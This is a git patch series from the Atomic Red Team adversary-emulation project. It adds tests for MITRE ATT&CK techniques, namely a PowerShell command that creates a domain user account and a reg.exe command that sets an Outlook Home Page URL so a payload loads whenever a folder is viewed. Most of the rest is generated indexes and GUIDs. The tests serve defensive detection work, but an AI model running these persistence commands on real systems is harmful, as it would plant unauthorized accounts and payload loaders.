Domain Admin! From 17639d4d958dd7f0feab444637bbae5af1601e94 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 11 Feb 2021 17:18:52 +0000 Subject: [PATCH 116/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1136.002/T1136.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index b8a9a7a3..4bdc79bb 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -51,6 +51,7 @@ atomic_tests: name: command_prompt elevation_required: false # Requires a user to be a Domain Admin! - name: Create a new Domain Account using PowerShell + auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 description: | Creates a new Domain User using the credentials of the Current User supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 34a68e85..fa0cd5a1 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -659,3 +659,4 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 9d71c492-ea2e-4c08-af16-c6994cdf029f 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 +5a3497a4-1568-4663-b12a-d4a5ed70c7d7 From 43bda07d491ab8579fbe95a85cdb0c65bad59df3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 17:19:00 +0000 Subject: [PATCH 117/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 37 ++++++++++++++ atomics/T1136.002/T1136.002.md | 48 +++++++++++++++++++ 6 files changed, 89 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 99e74211..587975b9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cc4d262a..036c16ce 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 1d2baaf6..a5b8b9cf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -249,6 +249,7 @@ - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.014 Emond](../../T1546.014/T1546.014.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e790f09c..de725c5f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -630,6 +630,7 @@ - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e79f7cb0..acdfb3e2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11752,6 +11752,43 @@ persistence: ' name: command_prompt elevation_required: false + - name: Create a new Domain Account using PowerShell + auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + description: 'Creates a new Domain User using the credentials of the Current + User + +' + supported_platforms: + - windows + input_arguments: + username: + description: Name of the Account to be created + type: String + default: T1136.002_Admin + password: + description: Password of the Account to be created + type: String + default: T1136_pass123! + executor: + command: | + $SamAccountName = '#{username}' + $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) + $User.SamAccountName = $SamAccountName + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + $User.DisplayName = $SamAccountName + $User.Save() + $User + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: powershell + elevation_required: false T1078.002: technique: external_references: diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index c3029be0..cf70f9c5 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not - [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon) +- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell) +
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain +
+
+ +## Atomic Test #3 - Create a new Domain Account using PowerShell +Creates a new Domain User using the credentials of the Current User + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Name of the Account to be created | String | T1136.002_Admin| +| password | Password of the Account to be created | String | T1136_pass123!| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$SamAccountName = '#{username}' +$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force +Add-Type -AssemblyName System.DirectoryServices.AccountManagement +$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) +$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) +$User.SamAccountName = $SamAccountName +$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) +$User.SetPassword($TempCred.GetNetworkCredential().Password) +$User.Enabled = $True +$User.PasswordNotRequired = $False +$User.DisplayName = $SamAccountName +$User.Save() +$User +``` + +#### Cleanup Commands: +```powershell +net user "#{username}" >nul 2>&1 /del /domain +``` + + + + +
From 6573d408018f55abf3f850e9c6246642d9c65d99 Mon Sep 17 00:00:00 2001 From: Alain Homewood <16848139+inzlain@users.noreply.github.com> Date: Fri, 12 Feb 2021 09:47:27 +1300 Subject: [PATCH 118/131] =?UTF-8?q?Added=20test=20for=20T1137.004=20to=20t?= =?UTF-8?q?est=20Outlook=20Home=20Page=20persistence=20and=20pa=E2=80=A6?= =?UTF-8?q?=20(#1381)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Added test for T1137.004 to test Outlook Home Page persistence and payload execution * Fix ATT&CK technique numbers Co-authored-by: inzlain Co-authored-by: Carrie Roberts --- atomics/T1137.004/T1137.004.yaml | 39 ++++++++++++++++++++++++++++ atomics/T1137.004/src/T1137.004.html | 24 +++++++++++++++++ 2 files changed, 63 insertions(+) create mode 100644 atomics/T1137.004/T1137.004.yaml create mode 100644 atomics/T1137.004/src/T1137.004.html diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml new file mode 100644 index 00000000..f4c94011 --- /dev/null +++ b/atomics/T1137.004/T1137.004.yaml @@ -0,0 +1,39 @@ +--- +attack_technique: T1137.004 +display_name: "Office Application Startup: Outlook Home Page" + +atomic_tests: +- name: Install Outlook Home Page Persistence + description: | + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. + + Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + supported_platforms: + - windows + + input_arguments: + url: + description: URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) + type: string + default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html + outlook_version: + description: Version of Outlook that is installed + type: string + default: 16.0 + # Microsoft 365: 16.0 + # Outlook 2019: 16.0 + # Outlook 2016: 16.0 + # Outlook 2013: 15.0 + outlook_folder: + description: Name of the Outlook folder to modify the homepage setting for + type: string + default: Inbox + # Default folder names as they appear in the registry: https://support.microsoft.com/en-us/office/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04 + + executor: + name: command_prompt + elevation_required: false + command: | + reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f + cleanup_command: | + reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f diff --git a/atomics/T1137.004/src/T1137.004.html b/atomics/T1137.004/src/T1137.004.html new file mode 100644 index 00000000..81c6c60e --- /dev/null +++ b/atomics/T1137.004/src/T1137.004.html @@ -0,0 +1,24 @@ + + + + Atomic Red Team + + + +

Atomic Red Team

+ + + + From 8ba4d679870c23d3ee210d7bb71cb300f6fd85f7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 11 Feb 2021 20:47:50 +0000 Subject: [PATCH 119/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1137.004/T1137.004.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml index f4c94011..d6fa8728 100644 --- a/atomics/T1137.004/T1137.004.yaml +++ b/atomics/T1137.004/T1137.004.yaml @@ -4,6 +4,7 @@ display_name: "Office Application Startup: Outlook Home Page" atomic_tests: - name: Install Outlook Home Page Persistence + auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e description: | This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index fa0cd5a1..90a73c08 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -660,3 +660,4 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 9d71c492-ea2e-4c08-af16-c6994cdf029f 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 +7a91ad51-e6d2-4d43-9471-f26362f5738e From 881e46997b60e8b4e76a59d8cb5a21f0d6d961e1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 20:47:58 +0000 Subject: [PATCH 120/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 36 +++++++++++++- atomics/T1137.004/T1137.004.md | 49 +++++++++++++++++++ 10 files changed, 94 insertions(+), 7 deletions(-) create mode 100644 atomics/T1137.004/T1137.004.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index e81b9369..68c38192 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"